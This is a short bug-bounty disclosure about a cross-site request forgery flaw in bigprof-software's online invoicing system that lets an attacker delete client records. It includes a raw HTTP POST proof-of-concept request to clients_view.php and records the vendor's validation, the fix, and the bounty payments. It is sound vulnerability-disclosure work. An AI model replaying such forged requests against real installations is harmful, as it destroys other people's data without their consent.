Cross-Site Request Forgery (CSRF) in bigprof-software/online-invoicing-system

Valid
Reported on Aug 4th 2021

✍️ Description

csrf bug to mass delete client

🕵️‍♂️ Proof of Concept

bellow request is vulnerable to csrf attack. here csrf token checking, no refferrer checking . There is nothing to prevent csrf attack .

POST /online-invoicing-system/app/clients_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: http://localhost
Connection: close
Referer: http://localhost/online-invoicing-system/app/clients_view.php

delete_x=1&SelectedID=1

💥 Impact

csrf

We have contacted a member of the bigprof-software/online-invoicing-system team and are waiting to hear back a month ago
BigProf Software validated this vulnerability 2 days ago
ranjit-git has been awarded the disclosure bounty
$25
The fix bounty is now up for grabs
$6.25
BigProf Software confirmed that a fix has been merged on 7e5f4d 2 days ago
BigProf Software has been awarded the fix bounty
$6.25